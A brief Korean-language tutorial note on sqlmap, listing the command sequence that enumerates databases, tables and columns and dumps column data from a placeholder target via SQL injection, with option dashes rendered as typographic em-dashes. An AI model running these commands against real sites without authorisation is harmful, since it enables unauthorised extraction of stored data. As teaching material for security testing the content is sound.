참고영상 : https://youtu.be/w9SdZJd07OA
sqlmap은 SQL Injection 자동화 도구 중 가장 대표적인 도구이다.
GET 데이터의 경우 -u 옵션을 활용하여 타겟을 지정할 수 있으며
POST 데이터의 경우 -u 옵션 뒤 —data 옵션을 이용하여 파라미터를 지정할 수 있다.
sqlmap -u “target” —dbs 명령을 이용하여 데이터베이스 이름을 조회
sqlmap -u “target” -D [DB_name] —table 명령을 이용하여 테이블 명 조회
sqlmap -u “target” -D [DB_name] -T [table_name] —columns 명령을 이용하여 컬럼 명 조회
sqlmap -u “target” -D [DB_name] -T [table_name] -C [column_name] —dump 명령을 이용하여
컬럼 데이터 추출
